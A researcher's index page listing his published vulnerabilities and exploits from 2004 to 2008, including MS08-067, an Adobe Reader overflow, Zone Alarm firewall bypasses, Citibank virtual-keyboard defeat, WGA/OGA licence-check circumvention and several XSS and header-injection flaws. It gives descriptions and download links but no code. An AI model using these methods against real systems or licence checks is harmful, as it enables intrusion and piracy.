Vulnerability Research & Exploit Development
| Home |
Note: All the vulnerabilities/exploits listed here are all researched and discovered by me except the one highlighted in blue (In this case only the exploit is by me). In other words Vulnerabilities that are highlighted in blue are not discovered by me but the exploit code published are mine.
To support my work, make a donation.
|
Microsoft Windows Server Service (MS08-067) Exploit Release Date: 17th Nov, 2008 |
|
Description: This exploit demonstrate the vulnerability found in Microsoft Windows Server Service (SRVSVC). The download includes the python exploit script. Presently the exploit is only made to work against win2k and win2k3-sp2. I have no plans as such to plugin the xp payload incase I get time I may update it in future. Download Link : srvsvc[ms08-067] exploit |
|
Copyright © 2008 Debasis Mohanty |
|
Adobe Reader Javascript Printf Buffer Overflow Exploit Release Date: 6th Nov, 2008 |
|
Description: This exploit demonstrate the vulnerability found in Adobe Reader javascript util.printf method. The download includes the exploit script which needs to be embedded into the pdf file for exploit test. Download Link : Adobe CVE-2008-2992 [TXT] |
|
Copyright © 2008 Debasis Mohanty |
|
*Disabling GDS Desktop Link Integration In Google Pages Release Date: 27th Feb, 2007 |
|
Description: This article discuss a bit about why the GDS issues revolves primarily around the GDS Desktop link and how one can fix it permanently by disabling it which will ensure that users can still use GDS without the fear against exploits that are targeted towards the desktop link. Download Link : gds-desktoplink-fix |
|
Copyright © 2007 Debasis Mohanty |
|
Defeating Microsoft Office Genuine Advantage (OGA) Check Release Date: 29th Jan, 2007 |
|
Description:
To say clean, there are 101 ways to defeat such lame attempt to
prevent piracy or have control over illegal usage of softwares. The
PoC describes two different methods to defeat Office Genuine
Advantage validation check |
|
Proof-of-Concept
:
defeat-oga |
|
Bugtraq ID: NA CVE: NA Other Related Links : tobeupdated |
|
Copyright © 2007 Debasis Mohanty |
|
Google AdWords Multiple HTTP response splitting vulnerabilities Release Date: 14th Dec, 2006 |
|
Description:
Multiple CRLF injection (aka HTTP response splitting)
vulnerabilities are identified in Google AdWords, which may be
exploited by a remote attackers to inject arbitrary HTTP headers. |
|
Proof-of-Concept
:
adwords-crlf-injection |
|
Bugtraq ID: NA CVE: NA Other Related Links : Zone-H Media Publications: internetnews.com |
|
Copyright © 2006 Debasis Mohanty |
|
Multiple HTTP response splitting vulnerabilities in SHOP-SCRIPT Release Date: 23rd Oct, 2006 |
|
Description:
Multiple CRLF injection (aka HTTP response splitting)
vulnerabilities are identified in Shop-Script PREMIUM, which may be
exploited by a remote attackers to inject arbitrary HTTP headers. |
|
Proof-of-Concept
:
shop-script crlf injection |
|
Bugtraq ID:
20685 CVE: CVE-2006-5566 Other Related Links : FrSIRT, Secunia.com |
|
Copyright © 2006 Debasis Mohanty |
|
Microsoft Excel File Embedded Shockwave Flash Object Exploit Release Date: 20th Jun, 2006 |
|
Description:
Malicious Flash files with explicit java scripts can be embedded
within excel spreadsheets using “Shockwave Flash Object” which can
be made to run once the file is opened by the user. It doesn’t
require user’s intervention to activate the object rather it runs
automatically once the file is opened.
|
|
Proof-of-Concept
:
xls-embed-swf-expl |
|
Bugtraq ID:
18583 CVE: CVE-2006-3014 Other Related Links : Microsoft Bulletin, Juniper, SecuriTeam, ISS X-Force, Adobe, FrSIRT |
|
Copyright © 2006 Debasis Mohanty |
|
Firefox (with IETab Plugin) Null Pointer Dereferences Bug Release Date: 17th May, 2006 |
|
Description:
Firefox with the IETab installed crashes when ietab plugin is unable
to handle specific javascripts. It seems to be a null pointer
dereference bug. Refer the PoC (Proof of Concept) for more details. |
|
Proof-of-Concept
:
ff-ietab-die |
|
Bugzilla Bug:
14151 CVE: CVE-2006-2538 Other Related Links : nist.gov, ISS X-Force |
|
Copyright © 2006 Debasis Mohanty |
|
w3wp remote DoS due to improper reference of STA COM components in ASP.NET Release Date: 21st Mar, 2006 |
|
Description:
Often developers forget to use the “AspCompat” directive which is
required while referencing COM components in ASP.NET. Missing
AspCompat directive causes general instability and poor performance
of the web application, just a simple increase of load on a web
server may cause it to crash. After working for more than one month
with Microsoft (MSRC) on this issue, it is finally concluded that
the w3wp crash can occur un-expectedly and is due to improper
reference of COM or COM+ in the asp.net applications. Refer
the PoC (Proof of Concept) for more details. |
|
Proof-of-Concept
:
w3wp-remote-dos |
|
Bugtraq ID:
17188 CVE: CVE-2006-1364 Other Related Links : SecuriTeam, security.nnov.ru, ISS X-Force, nist.gov, milw0rm |
|
Copyright © 2006 Debasis Mohanty |
|
Google Reader 'Preview' and 'Lens' Script Improper Feed Validation Vulnerability Release Date: 22nd Feb, 2006 |
|
Description:
Google reader is a rss and atom feed reader which displays only
those contents which the user has subscribed for however two
vulnerabilities has been identified which may allow an attacker
to entice it's victim (using Google reader service) to view
unwanted web contents carrying malicious payloads. |
|
Proof-of-Concept
:
google-reader-vuln |
|
Bugtraq ID:
* CVE: * Other Related Links : Zone-H, Anti-Phishing Italia |
|
Copyright © 2006 Debasis Mohanty |
|
phpMyChat Identical User Id and Password Authentication Bypass Vulnerability Release Date: 20th Feb, 2006 |
|
Description:
In the default installation of phpmychat (version 0.14.5)
any unregistered user can gain access to the chat rooms by
inputting identical user name and password in the input box.
i.e. the user name should be same as password. I tried
logging in through various vulnerable sites using identical
user id and password combination which granted me
un-authorized access to the rooms. |
|
Proof-of-Concept
:
phpMyChat-Auth-Bypass |
|
Bugtraq ID:
* CVE: * Other Related Links : ISS X-Force, OSVDB, security.nnov.ru |
|
Copyright © 2006 Debasis Mohanty |
|
Zone Labs Products Advance Program Control and OS Firewall (Behavioral Based) Technology Bypass Vulnerability Release Date: 8th Nov, 2005 |
|
Description:
Zone Alarm products with Advance Program Control or OS
Firewall Technology enabled, detects and blocks almost
all those APIs (like Shell, ShellExecuteEx,
SetWindowText, SetDlgItem etc) which are commonly used
by malicious programs to send data via http by
piggybacking over other trusted programs. However, it is
still possible for a malicious program (Trojans or worms
etc) to make outbound connections to the evil site by
piggybacking over trusted Internet browser using “HTML
Modal Dialog” in conjunction with simple “JavaScript”.
Here it is assumed that the default browser (IE or
Firefox etc) has authorization to access internet. |
|
Proof-of-Concept
:
osfwbypass-demo.zip |
|
Bugtraq ID:
15347 CVE: CVE-2005-3560 Other Related Links : Securityfocus, OSVDB, Secunia, ISS X-Force, SecuriTeam |
|
Copyright © 2005 Debasis Mohanty |
|
Bypassing Zone Alarm Firewall Using DDE-IPC Release Date: 28th Sep, 2005 |
|
Description:
While I was testing desktop based firewalls (here it
is Zone Alarm Pro and Free version) with the
firewall evasion kit developed by me, I found that a
very old flaw still exists in many latest versions
of desktop based firewalls. It is possible for a
malicious program to bypass a desktop based firewall
by using DDE-IPC (Direct Data Exchange –
Interprocess Communications) which enables an
un-trusted program to communicate with the attacker
or access internet via other trusted programs (Ex:
Internet Explorer). This flaw is known since before
year 2003. |
|
Proof-of-Concept
:
zabypass.zip |
|
Bugtraq
ID:
14966 CVE: * Other Related Links : Zone Labs Advisory, Securityfocus, FrSIRT Media Publications: news.zdnet.com |
|
Copyright © 2005 Debasis Mohanty |
|
Defeating Citi-Bank Virtual Keyboard Protection Release Date: 6th Aug, 2005 |
|
Description: Early this year, Citi-Bank introduced the concept of Virtual Keyboard to defend against malicious programs like keyloggers, Trojans and spywares etc. However, the Virtual Keyboard concept can be easily defeated by using Win32 APIs to access HTML documents. Refer the PoC (Proof of Concept) for more details. |
|
Proof-of-Concept
:
defeat-citibank-vk.zip |
|
Bugtraq ID:
* CVE: * Other Related Links : ISS X-Force, US-CERT, Virus.org, Hacknthebox.org |
|
Copyright © 2005 Debasis Mohanty |
|
Indiatimes Shopping Cart XSS (Cross Site Scripting) Vulnerability Release Date: 29th July, 2005 |
|
Description: Indiatimes shopping cart is one of the largest shopping and auctioning portal in India. Indiatimes Shopping Cart (http://store.indiatimes.com) can be exploited by any malicious user to conduct cross-site scripting and script insertion attacks. The Input passed to certain parameters in various scripts isn't properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML or script code in a user's browser session in context of an affected site by tricking the user into visiting a malicious website or follow a specially crafted link. |
|
Proof-of-Concept
:
Indiatimes-sc-xss |
|
Bugtraq
ID:
* CVE: * Other Related Links : security.nnov.ru |
|
Copyright © 2005 Debasis Mohanty |
|
Defeating Microsoft WGA (Windows Genuine Advantage) Validation Check Release Date: 23rd May, 2005 |
|
Description: WGA (Windows Genuine Advantage) is a concept introduced by Microsoft builds functionality in its few of the public beta products to conduct a genuine product check before the product gets installed. MS products or tools with WGA check enabled can only be installed on a valid / genuine copy of MS Windows XP. Incase it is a pirated copy then the product denies to install. If you are aware of Microsoft WGA validation then you can directly jump in to the PoC section otherwise it is advisable to read on WGA and what it does before reading the PoC. |
|
Proof-of-Concept
:
defeating-wga-check.zip |
|
Bugtraq
ID:
* CVE: * Other Related Links : OSVDB Media Publications: news.com, timesofindia, pcmag, rediff-news, businessstandard |
|
Copyright © 2005 Debasis Mohanty |
|
CuteNews 'archive' parameter XSS (Cross Site Scripting) Vulnerability Release Date: 16th Aug, 2004 |
|
Description: CuteNews "archive" parameter is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. An attacker can embed HTML or JavaScript in the archive parameter in a specially-crafted URL request to the show_archive.php script, which would be executed in the victim's Web browser within the security context of the hosting site. An attacker can also use this vulnerability to steal the victim's cookie-based authentication credentials. |
|
Proof-of-Concept
:
cutenews-xss |
|
Bugtraq
ID:
10948 CVE: * Other Related Links : Securityfocus, OSVDB, Secunia, ISS X-Force Nessus Plugin : nessus-plugin |
-- :: Tr0y/n0psl3d (a.k.a Debasis Mohanty) :: --
For all your queries / comments / love / hate / flames / appreciations, shoot a mail at:
d3basis . m0hanty [AT] gmail . com